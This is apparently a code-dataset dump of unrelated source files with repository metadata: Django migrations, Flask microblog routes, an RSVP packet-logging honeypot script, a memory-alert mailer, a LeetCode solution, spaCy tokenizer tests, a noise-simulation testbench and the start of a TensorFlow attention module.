Ycentroids = np.r_[np.ones((winLen))*Ycentroids[0],Ycentroids,np.ones((winLen))*Ycentroids[-1]]
Ycentroids = np.convolve(w/w.sum(),Ycentroids,mode='same')[(winLen):-(winLen)]
sz = math.ceil(maxRange/32)*16
fig = plt.figure()#figsize=(10, 10), dpi=5)
totalFrames =500
fc = 0
#with writer.saving(fig, "move.mp4", totalFrames):# len(posDF.groupby('frame'))):
for fnum, frame in posDF.groupby('frame'):
fc = fc + 1
if fc>totalFrames:
break
#frame = frame[frame.c_id==0]
xp = frame['x'].values
yp = frame['y'].values
xh = 0.1*frame['dx'].values
yh = 0.1*frame['dy'].values
xc = Xcentroids[fc]
yc = Ycentroids[fc]
plt.clf()
plt.quiver(gridPos[:,:,0],gridPos[:,:,1],grid[:,:,0],grid[:,:,1],angles='xy', scale_units='xy', scale=1.0/32.0, headwidth=1)
l, = plt.plot(xp,yp, 'ro')
plt.quiver(xp,yp,xh,yh,angles='xy', scale_units='xy', color='r', scale=1.0/32.0, headwidth=1.5)
#plt.axis([0,4000, 2000,-2000])
plt.axis('equal')
l.axes.get_xaxis().set_visible(False)
l.axes.get_yaxis().set_visible(False)
l.set_data(xp, yp)
l.axes.set_xlim(xc-sz,xc+sz)
l.axes.set_ylim(yc-sz,yc+sz)
plt.savefig('frames/fig'+'{0:05d}'.format(fc)+'.png')
#writer.grab_frame()
break
| [
"colin.j.torney@gmail.com"
] | colin.j.torney@gmail.com |
7db1a2988c552372fb5395ea469d95dd7642b33f | f561a219c57bd75790d3155acac6f54299a88b08 | /splash_screen/migrations/0001_initial.py | 595c80d3d3c899474e567d2f95d683c19e6bc3ae | [] | no_license | ujjwalagrawal17/OfferCartServer | 1e81cf2dc17f19fa896062c2a084e6b232a8929e | b3cd1c5f8eecc167b6f4baebed3c4471140d905f | refs/heads/master | 2020-12-30T15:31:04.380084 | 2017-05-24T18:26:20 | 2017-05-24T18:26:20 | 91,155,405 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,307 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-04-06 17:28
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='FcmData',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fcm', models.CharField(blank=True, max_length=512, null=True)),
('created', models.DateTimeField(auto_now=True)),
('modified', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='VersionData',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('version', models.SmallIntegerField(default=0)),
('compulsory_update', models.SmallIntegerField(default=0)),
('version_type', models.CharField(blank=True, max_length=120, null=True)),
('created', models.DateTimeField(auto_now=True)),
('modified', models.DateTimeField(auto_now_add=True)),
],
),
]
| [
"ujjwal.iitism@gmail.com"
] | ujjwal.iitism@gmail.com |
55845668b67565b8b7fe585c190c0dac8611d35d | 097c6263e0f30f54ce2deb8d4a6e4c2d8e5c675d | /app/routes.py | 850e06abf30295eeba4ea219d8f1e6fbdd850562 | [] | no_license | Abhay-1812/microblog3 | 1b5d15026ea22ef05cbfe457abd760cca322a069 | 82ba815b0346e2adf96f9cb6ede0bbaefb338748 | refs/heads/main | 2023-05-25T09:20:25.122622 | 2021-06-03T08:09:26 | 2021-06-03T08:09:26 | 373,429,493 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,145 | py | from app import app
from flask import render_template,url_for,flash,redirect
from app.forms import LoginForm
from app.models import User
from flask_login import current_user, login_user
from flask_login import logout_user
from flask_login import login_required
from flask import request
from werkzeug.urls import url_parse
from app import db
from app.forms import RegistrationForm
from datetime import datetime
from app.forms import EditProfileForm
from app.forms import EmptyForm
from app.forms import PostForm
from app.models import Post
from app.models import Comment
from app.forms import ResetPasswordRequestForm
from app.email import send_password_reset_email
from app.forms import ResetPasswordForm
from app.forms import AddCommentForm
from guess_language import guess_language
@app.route('/login', methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('index'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first()
if user is None or not user.check_password(form.password.data):
flash('Invalid username or password')
return redirect(url_for('login'))
login_user(user, remember=form.remember_me.data)
next_page = request.args.get('next')
if not next_page or url_parse(next_page).netloc != '':
next_page = url_for('index')
return redirect(next_page)
return render_template('login.html', title='Sign In', form=form)
@app.route('/logout')
def logout():
logout_user()
return redirect(url_for('index'))
@app.route('/register', methods=['GET','POST'])
def register():
if current_user.is_authenticated:
return redirect(url_for('index'))
form = RegistrationForm()
if form.validate_on_submit():
user = User(username=form.username.data, email=form.email.data)
user.set_password(form.password.data)
db.session.add(user)
db.session.commit()
flash('Congratulations, you are now a registered user!')
return redirect(url_for('login'))
return render_template('register.html', title='Register', form=form)
@app.route('/user/<username>')
@login_required
def user(username):
user = User.query.filter_by(username=username).first_or_404()
page = request.args.get('page', 1, type=int)
posts = user.posts.order_by(Post.timestamp.desc()).paginate(
page, app.config['POSTS_PER_PAGE'], False)
next_url = url_for('user', username=user.username, page=posts.next_num) \
if posts.has_next else None
prev_url = url_for('user', username=user.username, page=posts.prev_num) \
if posts.has_prev else None
form = EmptyForm()
return render_template('user.html', user=user, posts=posts.items,
next_url=next_url, prev_url=prev_url, form=form)
@app.before_request
def before_request():
if current_user.is_authenticated:
current_user.last_seen = datetime.utcnow()
db.session.commit()
@app.route('/edit_profile', methods=['GET','POST'])
@login_required
def edit_profile():
form = EditProfileForm()
if form.validate_on_submit():
current_user.username = form.username.data
current_user.about_me = form.about_me.data
db.session.commit()
flash('your changes have been saved.')
return redirect(url_for('edit_profile'))
elif request.method == 'GET':
form.username.data = current_user.username
form.about_me.data = current_user.about_me
return render_template('edit_profile.html', title='Edit Profile', form = form)
@app.route('/follow/,<username>', methods=['POST'])
@login_required
def follow(username):
form = EmptyForm()
if form.validate_on_submit():
user = User.query.filter_by(username=username).first()
if user is None:
flash('User not found')
return redirect(url_for('index'))
if user == current_user:
flash('You cannot follow yourself!')
return redirect(url_for('user',username=username))
current_user.follow(user)
db.session.commit()
flash('You are following {}!'.format(username))
return redirect(url_for('user',username=username))
else:
return redirect(url_for('index'))
@app.route('/unfollow/,<username>', methods=['POST'])
@login_required
def unfollow(username):
form = EmptyForm()
if form.validate_on_submit():
user = User.query.filter_by(username=username).first()
if user is None:
flash('User not found')
return redirect(url_for('index'))
if user == current_user:
flash('You cannot unfollow yourself!')
return redirect(url_for('user',username=username))
current_user.unfollow(user)
db.session.commit()
flash('You are not following {}!'.format(username))
return redirect(url_for('user',username=username))
else:
return redirect(url_for('index'))
@app.route('/',methods=['GET','POST'])
@app.route('/index',methods=['GET','POST'])
@login_required
def index():
form = PostForm()
if form.validate_on_submit():
post = Post(body=form.post.data, author=current_user)
db.session.add(post)
db.session.commit()
flash('Your post is now live!')
return redirect(url_for('index'))
# posts = current_user.followed_posts().all()
page = request.args.get('page', 1, type=int)
posts = current_user.followed_posts().paginate(page, app.config['POSTS_PER_PAGE'], False)
next_url = url_for('index', page=posts.next_num) \
if posts.has_next else None
prev_url = url_for('index', page=posts.prev_num) \
if posts.has_prev else None
return render_template('index.html',title='Home Page',form=form,posts=posts.items,next_url=next_url,prev_url=prev_url)
@app.route('/explore')
@login_required
def explore():
page = request.args.get('page', 1, type=int)
posts = Post.query.order_by(Post.timestamp.desc()).paginate(page, app.config['POSTS_PER_PAGE'], False)
next_url = url_for('index', page=posts.next_num) \
if posts.has_next else None
prev_url = url_for('index', page=posts.prev_num) \
if posts.has_prev else None
return render_template('index.html',title='Explore', posts=posts.items,next_url=next_url,prev_url=prev_url)
@app.route('/reset_password_request', methods=['GET', 'POST'])
def reset_password_request():
if current_user.is_authenticated:
return redirect(url_for('index'))
form = ResetPasswordRequestForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user:
send_password_reset_email(user)
flash('Check your email for the instructions to reset your password')
return redirect(url_for('login'))
return render_template('reset_request_password.html',
title='Reset Password', form=form)
@app.route('/reset_password/<token>', methods=['GET', 'POST'])
def reset_password(token):
if current_user.is_authenticated:
return redirect(url_for('index'))
user = User.verify_reset_password_token(token)
if not user:
return redirect(url_for('index'))
form = ResetPasswordForm()
if form.validate_on_submit():
user.set_password(form.password.data)
db.session.commit()
flash('Your password has been reset.')
return redirect(url_for('login'))
return render_template('reset_password.html', form=form)
@app.route('/like/<int:post_id>/<action>')
@login_required
def like_action(post_id, action):
post = Post.query.filter_by(id=post_id).first_or_404()
if action == 'like':
current_user.like_post(post)
db.session.commit()
if action == 'unlike':
current_user.unlike_post(post)
db.session.commit()
return redirect(request.referrer)
@app.route('/post/<int:post_id>/comment', methods=["GET", "POST"])
@login_required
def add_comment(post_id):
post = Post.query.filter_by(id=post_id).first_or_404()
form = AddCommentForm()
if form.validate_on_submit():
comment = Comment(body=form.body.data,author=current_user.id,title=post)
db.session.add(comment)
db.session.commit()
flash("Your comment has been added to the post", "success")
return redirect(url_for("user", username=current_user.username))
return render_template("comments.html",title="Comment post",form=form,post_id=post_id)
| [
"dhillonabhay1@gmail.com"
] | dhillonabhay1@gmail.com |
0c6f4a15555b5ae5f9e16ca3aed6a1cfae5f982f | 4513fae798d527f55501f42b856c3412766062a9 | /products/migrations/0001_initial.py | 54683f5691c93f6953b3730aff1863d5f81ec3fc | [] | no_license | bearadamsj/dj1 | c4ac78c74e68cd4051116ea630a23cde8800394b | 2bc55b9449c7cd64d65a1a7f785933fe9b612903 | refs/heads/master | 2023-03-28T14:17:10.795041 | 2021-04-01T00:51:13 | 2021-04-01T00:51:13 | 353,528,517 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 720 | py | # Generated by Django 3.1.7 on 2021-03-19 05:47
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=120)),
('description', models.TextField(blank=True, null=True)),
('price', models.DecimalField(decimal_places=2, max_digits=1000000)),
('summary', models.TextField(default='this is cool!')),
],
),
]
| [
"zhu11&dmin@bitzer.cn"
] | zhu11&dmin@bitzer.cn |
4693d1d06b71c1fb2a188430faad444dcb9116db | 2f6f7c056df8ed13273866cc4ed5bcc0e49c4d93 | /catch_all/catch_rsvp | 248edc70e7d6f21a36287d148c164e0c2bd13c1f | [] | no_license | ssem/honeypots | 8e5eccc614536d05d977a2b5fa93839f06f5cec7 | 7f137f69e88f671d69f3de91b30e160b7ebb0419 | refs/heads/master | 2021-01-18T21:34:03.110770 | 2016-04-18T20:25:02 | 2016-04-18T20:25:02 | 31,721,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,083 | #!/usr/bin/env python
import os
import sys
import struct
import socket
import select
import argparse
class Catch_All:
def __init__(self):
self.socket = socket.socket(socket.AF_INET,
socket.SOCK_RAW,
socket.IPPROTO_RSVP)
def __del__(self):
try:self.socket.close()
except:pass
def _unpack_ip_header(self, packet):
header = struct.unpack('!BBHHHBBH4s4sHHLLBBHHH', packet[0:40])
return {'dsf': header[1],
'total_length': header[2],
'id': header[3],
'flags': header[4],
'ttl': header[5],
'protocol': header[6],
'checksum': header[7],
'src_ip': socket.inet_ntoa(header[8]),
'dst_ip': socket.inet_ntoa(header[9]),
'src_port': header[10],
'dst_port': header[11],
'seq': header[12],
'ack': header[13],
'length': header[14],
'flags': header[15],
'windows': header[16],
'checksum': header[17],
'urg_pnt': header[18]}
def _pretty_print(self, ip_h):
msg = '%s:%s -> %s:%s\n' % (ip_h['src_ip'], ip_h['src_port'],
ip_h['dst_ip'], ip_h['dst_port'])
sys.stdout.write(msg)
def run(self):
while True:
try:
inp, outp, exceptions = select.select([self.socket], [], [])
for sock in inp:
packet, source = sock.recvfrom(1024)
ip_h = self._unpack_ip_header(packet)
self._pretty_print(ip_h)
except KeyboardInterrupt:
exit('bye')
except Exception as e:
sys.stderr.write('[ERROR] %s\n' % e)
if __name__ == "__main__":
if os.geteuid() != 0:
exit("must run as root")
parser = argparse.ArgumentParser()
args = parser.parse_args()
CA = Catch_All()
CA.run()
| [
"ssem@tacnetsol.com"
] | ssem@tacnetsol.com | |
5aaefe82f83adb270dd3fb0e626bee58be47b308 | 13cf5e8616e2f1bfbacd360d6c60a1b8b48b3b5a | /16/part2.py | c557dc0deb9de57a238ba9b7a8ce3481dc2501f3 | [] | no_license | uwatm8/aoc2020 | e73aed7d8c9dfddf0bff53139d2625d3fda46699 | be4170a455b64d10c63434b817a0fbf454b18304 | refs/heads/main | 2023-02-06T10:40:43.852449 | 2020-12-28T01:14:22 | 2020-12-28T01:14:22 | 319,053,533 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,219 | py | filepath = 'data.txt'
l = []
with open(filepath) as fp:
line = fp.readline()
while line:
l.append(line.strip())
line = fp.readline()
nls = len(l)
ans = 0
fields = {}
hasFields = False
newyt = False
mynums = []
nearbynums = []
def canBeIndex(i, n):
key = list(fields.keys())[i]
if (n >= fields[key]['min1'] and n <= fields[key]['max1']) or (n >= fields[key]['min2'] and n <= fields[key]['max2']):
return True
return False
def de(n):
n = int(n)
for f in fields:
if f != None:
if (n >= fields[f]['min1'] and n <= fields[f]['max1']) or (n >= fields[f]['min2'] and n <= fields[f]['max2']):
return True
return False
for i in range(nls):
tl = l[i]
if not hasFields:
fn = tl.split(': ')[0]
if not fn:
hasFields = True
continue
min1 = int(tl.split(': ')[1].split(' or ')[0].split('-')[0])
max1 = int(tl.split(': ')[1].split(' or ')[0].split('-')[1])
min2 = int(tl.split(': ')[1].split(' or ')[1].split('-')[0])
max2 = int(tl.split(': ')[1].split(' or ')[1].split('-')[1])
fields[fn] = {'min1': min1, 'max1': max1, 'min2': min2, 'max2': max2}
if False:
print(min1)
print(max1)
print(min2)
print(max2)
print(" ")
continue
if i == len(fields) + 2:
for n in tl.split(','):
mynums.append(n)
if i > len(fields) + 4:
nums = []
for n in tl.split(','):
nums.append(int(n))
nearbynums.append(nums)
ts = tl.split(',')
rr = []
for nn in nearbynums:
for n in nn:
if(not de(n)):
rr.append(nn)
for r in rr:
nearbynums.remove(r)
indexes = []
columnCanBeField = []
for f in range(len(fields)):
columnCanBeField.append({})
for i in range(len(nearbynums[0])):
if not i in columnCanBeField[f]:
columnCanBeField[f][i] = True
def removekey(d, key):
print(d)
r = dict(d)
del r[key]
return r
for f in range(len(fields)):
for nn in range(len(nearbynums)):
for n in range(len(nearbynums[nn])):
if canBeIndex(f, nearbynums[nn][n]):
# print(canBeIndex(f, nearbynums[nn][n]))
continue
else:
# print(canBeIndex(f, nearbynums[nn][n]))
columnCanBeField[f][n] = False
def hasOnlyOne(d):
t = 0
for key in d.keys():
if d[key]:
t += 1
return t == 1
def theOne(d):
for i in range(len(d.keys())):
key = list(d.keys())[i]
if d[key]:
return i
def prune(n):
for f in range(len(fields)):
columnCanBeField[f][n] = False
column = {}
for i in range(len(fields) + 3):
for f in range(len(fields)):
if hasOnlyOne(columnCanBeField[f]):
to = theOne(columnCanBeField[f])
column[list(fields.keys())[f]] = to
for j in range(len(columnCanBeField[f])):
prune(to)
ans = 1
for key in fields.keys():
if key.count('departure'):
ans *= int(mynums[column[key]])
print("answer: ", ans)
| [
"hasta@student.chalmers.se"
] | hasta@student.chalmers.se |
70e757c0fdeae8986311446c704fac3633df52cf | a9fc0a578d6cbc3104a7a08f0f009e5a37c42f74 | /src/bag3_testbenches/measurement/pnoise/base.py | 2409b0c936c02c056038f5107408efacf0067e8f | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | zhaokai-l/bag3_testbenches | f832e3336a2ffe486f118d16822d8297e47f61dd | 334f0f0ab4eae2931c3ede5471b152329840bf86 | refs/heads/master | 2023-06-27T11:41:20.749692 | 2021-07-25T23:48:48 | 2021-07-25T23:48:48 | 297,793,219 | 1 | 0 | null | 2020-09-22T23:04:12 | 2020-09-22T23:04:11 | null | UTF-8 | Python | false | false | 2,913 | py | from typing import Any, Union, Sequence, Tuple, Optional, Mapping, Iterable, List, Set, Dict, Type
import abc
import numpy as np
from bag.simulation.data import SimData, AnalysisType
from bag.design.module import Module
from bag.simulation.core import TestbenchManager
from bag.simulation.data import SimNetlistInfo, netlist_info_from_dict
from bag3_liberty.data import parse_cdba_name, BusRange
from ..tran.analog import AnalogTranTB
from ...schematic.digital_tb_tran import bag3_testbenches__digital_tb_tran
from ...schematic.analog_tb_tran import bag3_testbenches__analog_tb_tran
class PNoiseTB(AnalogTranTB):
def __init__(self, *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
def get_netlist_info(self) -> SimNetlistInfo:
specs = self.specs
pnoise_options: Mapping[str, Any] = specs.get('pnoise_options', {})
trigger_dir = pnoise_options.get('trigger_dir', 'rise')
probe_thres = pnoise_options.get('probe_thres', 'v_VDD/2')
probe_pin = pnoise_options.get('probe_pins', '[outp outn]')
pnoise_options['events']['pm'] += f' trigger={probe_pin} target={probe_pin} triggerthresh={probe_thres} ' \
f'triggerdir={trigger_dir}'
pss_dict = dict(
type='PSS',
fund='1/t_per',
options=dict(
harms=pnoise_options.get('harms', 100),
errpreset=pnoise_options.get('errpreset', 'conservative'),
tstab=pnoise_options.get('tstab', 0),
autosteady=pnoise_options.get('autosteady', 'yes'),
maxacfreq=1e10,
),
save_outputs=self.save_outputs,
)
pnoise_dict = dict(
type='PNOISE',
start=1,
stop='0.5/t_per',
options=dict(
pnoisemethod=pnoise_options.get('pnoisemethod', 'fullspectrum'),
noisetype=pnoise_options.get('noisetype', 'sampled'),
saveallsidebands='yes',
lorentzian='yes',
),
events=pnoise_options['events'],
save_outputs=self.save_outputs,
)
pac_dict = dict(
type='PAC',
p_port=pnoise_options.get('p_port', 'outp'),
n_port=pnoise_options.get('n_port', 'outn'),
start=pnoise_options.get('ac_start', 1),
stop=pnoise_options.get('ac_stop', 100e9),
options=dict(
crossingdirection=trigger_dir,
thresholdvalue=probe_thres,
maxsideband=0,
sweeptype='relative',
ptvtype='sampled'
),
save_outputs=self.save_outputs,
)
sim_setup = self.get_netlist_info_dict()
sim_setup['analyses'] = [pss_dict, pnoise_dict, pac_dict]
return netlist_info_from_dict(sim_setup)
| [
"zhaokai_liu@berkeley.edu"
] | zhaokai_liu@berkeley.edu |
986d1d6dde1c0148d0569a83ed87756fdccbf521 | b6f9a54c9b237e45df67170c7dfdf26e73d8ab19 | /Monitor.py | b4b6935ba5909a7f853e487fdea240645f620b1d | [] | no_license | nfrjy/python | 094822483f6f95ef9465ceeb71935a5335113d5d | 53de810ce26cf73103dc9be72ee694434017e7aa | refs/heads/master | 2021-01-10T07:08:30.151757 | 2020-01-20T07:08:09 | 2020-01-20T07:08:09 | 45,826,996 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,903 | py | #!/usr/bin/python
#codeing:utf-8
from typing import Union
import psutil
import os
import smtplib
import configparser
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.mime.audio import MIMEAudio
from email.mime.application import MIMEApplication
import mimetypes
import os
class MyMail:
def __init__(self,mail_config_file):
config = configparser.ConfigParser()
config.read(mail_config_file)
self.smtp = smtplib.SMTP()
self.login_user = config.get('SMTP','login_user')
self.login_pwd = config.get("SMTP","login_pwd")
self.from_addr = config.get("SMTP","from_user")
self.to_addrs = config.get("SMTP","to_user")
self.host = config.get("SMTP","host")
self.port = config.get("SMTP","port")
def connect(self):
self.smtp.connect(self.host,self.port)
def login(self):
try:
self.smtp.login(self.login_user,self.login_pwd)
except Exception as e:
print ('%s' % e)
def sendmessage(self,mail_subject,mail_content,attachment_path_set):
msg = MIMEMultipart()
msg['From'] = self.from_addr
msg['To'] = ','.join(eval(self.to_addrs))
msg['Subject'] = mail_subject
Content = MIMEText(mail_content, _charset='gbk')
msg.attach(Content)
for attachment_path in attachment_path_set:
if os.path.exists(attachment_path):
type, coding = mimetypes.guess_type(attachment_path)
if type == None:
type = 'application/octet-stream'
major_type, minor_type = type.split('/', 1)
with open(attachment_path, 'rb') as file:
if major_type == 'text':
attachment = MIMEText(file.read(), _subtype=minor_type)
elif major_type == 'image':
attachment = MIMEImage(file.read(), _subtype=minor_type)
elif major_type == 'application':
attachment = MIMEApplication(file.read(), _subtype=minor_type)
elif major_type == 'audio':
attachment = MIMEAudio(file.read(), _subtype=minor_type)
attachment_name = os.path.basename(attachment_path)
attachment.add_header('Content-Disposition', 'attachment', filename=('gbk', '', attachment_name))
msg.attach(attachment)
full_text = msg.as_string()
self.smtp.sendmail(self.from_addr, eval(self.to_addrs), full_text)
def logout(self):
self.smtp.quit()
class Mem_Monitor:
def Get_MemTotal(self):
self.MemTotal = psutil.virtual_memory().total
return self.MemTotal
def Get_MemUsed(self):
self.MemUsed = psutil.virtual_memory().used
return self.MemUsed
def Used_Percent(self):
self.used_percent = float(self.MemUsed / self.MemTotal) * 100
return self.used_percent
if __name__=="__main__":
Monitor = True
gitlabMem = Mem_Monitor()
gitlabMem.Get_MemTotal()
gitlabMem.Get_MemUsed()
gitlabMem.Used_Percent()
if int(gitlabMem.Used_Percent()) > 80:
if Monitor == True:
mymail = MyMail('./mail.conf')
mymail.connect()
mymail.login()
mail_content = "Gitlab服务器内存详情:总内存: %s,已使用内存: %s,使用占比: %s %%," % (gitlabMem.Get_MemUsed(),gitlabMem.Get_MemUsed(),gitlabMem.Used_Percent())
mymail.sendmessage("Gitlab 服务器内存告警",mail_content,"None")
mymail.logout()
Monitor = False
else:
Monitor = True
| [
"58209376@qq.com"
] | 58209376@qq.com |
57ce4e23c369d0ac1c8990a08dd6f14bffa13f86 | ef3a7391b0a5c5d8e276355e97cbe4de621d500c | /venv/Lib/site-packages/spacy/tests/lang/en/test_exceptions.py | 6285a94089db310ac5481689b6030d62f9ea8679 | [
"Apache-2.0"
] | permissive | countBMB/BenjiRepo | 143f6da5d198ea6f06404b4559e1f4528b71b3eb | 79d882263baaf2a11654ca67d2e5593074d36dfa | refs/heads/master | 2022-12-11T07:37:04.807143 | 2019-12-25T11:26:29 | 2019-12-25T11:26:29 | 230,090,428 | 1 | 1 | Apache-2.0 | 2022-12-08T03:21:09 | 2019-12-25T11:05:59 | Python | UTF-8 | Python | false | false | 4,097 | py | # coding: utf-8
from __future__ import unicode_literals
import pytest
def test_en_tokenizer_handles_basic_contraction(en_tokenizer):
text = "don't giggle"
tokens = en_tokenizer(text)
assert len(tokens) == 3
assert tokens[1].text == "n't"
text = "i said don't!"
tokens = en_tokenizer(text)
assert len(tokens) == 5
assert tokens[4].text == "!"
@pytest.mark.parametrize("text", ["`ain't", """"isn't""", "can't!"])
def test_en_tokenizer_handles_basic_contraction_punct(en_tokenizer, text):
tokens = en_tokenizer(text)
assert len(tokens) == 3
@pytest.mark.parametrize(
"text_poss,text", [("Robin's", "Robin"), ("Alexis's", "Alexis")]
)
def test_en_tokenizer_handles_poss_contraction(en_tokenizer, text_poss, text):
tokens = en_tokenizer(text_poss)
assert len(tokens) == 2
assert tokens[0].text == text
assert tokens[1].text == "'s"
@pytest.mark.parametrize("text", ["schools'", "Alexis'"])
def test_en_tokenizer_splits_trailing_apos(en_tokenizer, text):
tokens = en_tokenizer(text)
assert len(tokens) == 2
assert tokens[0].text == text.split("'")[0]
assert tokens[1].text == "'"
@pytest.mark.parametrize("text", ["'em", "nothin'", "ol'"])
def test_en_tokenizer_doesnt_split_apos_exc(en_tokenizer, text):
tokens = en_tokenizer(text)
assert len(tokens) == 1
assert tokens[0].text == text
@pytest.mark.parametrize("text", ["we'll", "You'll", "there'll"])
def test_en_tokenizer_handles_ll_contraction(en_tokenizer, text):
tokens = en_tokenizer(text)
assert len(tokens) == 2
assert tokens[0].text == text.split("'")[0]
assert tokens[1].text == "'ll"
assert tokens[1].lemma_ == "will"
@pytest.mark.parametrize(
"text_lower,text_title", [("can't", "Can't"), ("ain't", "Ain't")]
)
def test_en_tokenizer_handles_capitalization(en_tokenizer, text_lower, text_title):
tokens_lower = en_tokenizer(text_lower)
tokens_title = en_tokenizer(text_title)
assert tokens_title[0].text == tokens_lower[0].text.title()
assert tokens_lower[0].text == tokens_title[0].text.lower()
assert tokens_lower[1].text == tokens_title[1].text
@pytest.mark.parametrize("pron", ["I", "You", "He", "She", "It", "We", "They"])
@pytest.mark.parametrize("contraction", ["'ll", "'d"])
def test_en_tokenizer_keeps_title_case(en_tokenizer, pron, contraction):
tokens = en_tokenizer(pron + contraction)
assert tokens[0].text == pron
assert tokens[1].text == contraction
@pytest.mark.parametrize("exc", ["Ill", "ill", "Hell", "hell", "Well", "well"])
def test_en_tokenizer_excludes_ambiguous(en_tokenizer, exc):
tokens = en_tokenizer(exc)
assert len(tokens) == 1
@pytest.mark.parametrize(
"wo_punct,w_punct", [("We've", "`We've"), ("couldn't", "couldn't)")]
)
def test_en_tokenizer_splits_defined_punct(en_tokenizer, wo_punct, w_punct):
tokens = en_tokenizer(wo_punct)
assert len(tokens) == 2
tokens = en_tokenizer(w_punct)
assert len(tokens) == 3
@pytest.mark.parametrize("text", ["e.g.", "p.m.", "Jan.", "Dec.", "Inc."])
def test_en_tokenizer_handles_abbr(en_tokenizer, text):
tokens = en_tokenizer(text)
assert len(tokens) == 1
def test_en_tokenizer_handles_exc_in_text(en_tokenizer):
text = "It's mediocre i.e. bad."
tokens = en_tokenizer(text)
assert len(tokens) == 6
assert tokens[3].text == "i.e."
@pytest.mark.parametrize("text", ["1am", "12a.m.", "11p.m.", "4pm"])
def test_en_tokenizer_handles_times(en_tokenizer, text):
tokens = en_tokenizer(text)
assert len(tokens) == 2
assert tokens[1].lemma_ in ["a.m.", "p.m."]
@pytest.mark.parametrize(
"text,norms", [("I'm", ["i", "am"]), ("shan't", ["shall", "not"])]
)
def test_en_tokenizer_norm_exceptions(en_tokenizer, text, norms):
tokens = en_tokenizer(text)
assert [token.norm_ for token in tokens] == norms
@pytest.mark.parametrize(
"text,norm", [("radicalised", "radicalized"), ("cuz", "because")]
)
def test_en_lex_attrs_norm_exceptions(en_tokenizer, text, norm):
tokens = en_tokenizer(text)
assert tokens[0].norm_ == norm
| [
"bengmen92@gmail.com"
] | bengmen92@gmail.com |
78e8a604cecf27fe811b0c948ad111c099ce963d | e54e1a63bffbe913f5e5018ace56cfa3eab1a72b | /practice/Leetcode/1253_reconstruct_a_2_row_binary_matrix.py | 2b71d9f4f15e8a18ca410c4daa4699f6e1846cec | [] | no_license | rmodi6/scripts | 5e27a46ce8970cbf601f132a53164c273f1812ea | 7cc47eecac00e6bd0b3ec74d7eed8ec3e0e77a84 | refs/heads/master | 2022-02-14T20:41:28.765751 | 2022-01-20T06:59:40 | 2022-01-20T06:59:40 | 168,207,721 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 976 | py | # https://leetcode.com/contest/weekly-contest-162/problems/reconstruct-a-2-row-binary-matrix/
import numpy as np
class Solution:
def reconstructMatrix(self, upper: int, lower: int, colsum: List[int]) -> List[List[int]]:
if upper + lower != sum(colsum):
return []
ans = np.zeros((2, len(colsum)), dtype='int32')
for i, n in enumerate(colsum):
if n == 2:
if upper > 0 and lower > 0:
ans[0][i], ans[1][i] = 1, 1
upper -= 1
lower -= 1
else:
return []
for i, n in enumerate(colsum):
if n == 1:
if upper > 0:
ans[0][i] = 1
upper -= 1
elif lower > 0:
ans[1][i] = 1
lower -= 1
else:
return []
return ans.tolist()
| [
"modi.ruchit6@gmail.com"
] | modi.ruchit6@gmail.com |
0212f9e5951c9f222ca5a846a070bf81530f2a1c | 47c175daf97051e1f5c37b161f16abbd5f5a506e | /modules/forward_attention.py | 1572b09366af7b47ef3fe8cd017f1bbae7507555 | [
"BSD-3-Clause"
] | permissive | nii-yamagishilab/self-attention-tacotron | 947d1d2eb8bc25f70331fbc401bf44c93ef92673 | 0ebd96114feab5a499964402a8ab7e402f0083b4 | refs/heads/master | 2021-07-11T06:13:18.202669 | 2020-06-19T03:04:42 | 2020-06-19T03:04:42 | 156,176,608 | 116 | 35 | BSD-3-Clause | 2020-06-19T03:04:43 | 2018-11-05T07:21:46 | Python | UTF-8 | Python | false | false | 6,383 | py | # ==============================================================================
# Copyright (c) 2018, Yamagishi Laboratory, National Institute of Informatics
# Author: Yusuke Yasuda (yasuda@nii.ac.jp)
# All rights reserved.
# ==============================================================================
""" """
import tensorflow as tf
from tensorflow.contrib.seq2seq import BahdanauAttention
from collections import namedtuple
def _location_sensitive_score(W_query, W_fill, W_keys):
dtype = W_query.dtype
num_units = W_keys.shape[-1].value or tf.shape(W_keys)[-1]
v_a = tf.get_variable("attention_variable",
shape=[num_units],
dtype=dtype,
initializer=tf.contrib.layers.xavier_initializer())
b_a = tf.get_variable("attention_bias",
shape=[num_units],
dtype=dtype,
initializer=tf.zeros_initializer())
return tf.reduce_sum(v_a * tf.tanh(W_keys + W_query + W_fill + b_a), axis=[2])
def _calculate_context(alignments, values):
'''
This is a duplication of tensorflow.contrib.seq2seq.attention_wrapper._compute_attention.
ToDo: Avoid the redundant computation. This requires abstraction of AttentionWrapper itself.
:param alignments: [batch_size, 1, memory_time]
:param values: [batch_size, memory_time, memory_size]
:return:
'''
# Reshape from [batch_size, memory_time] to [batch_size, 1, memory_time]
expanded_alignments = tf.expand_dims(alignments, 1)
context = tf.matmul(expanded_alignments, values) # [batch_size, 1, memory_size]
context = tf.squeeze(context, [1]) # [batch_size, memory_size]
return context
class ForwardAttentionState(namedtuple("ForwardAttentionState", ["alignments", "alpha", "u"])):
pass
class ForwardAttention(BahdanauAttention):
def __init__(self,
num_units,
memory,
memory_sequence_length,
attention_kernel,
attention_filters,
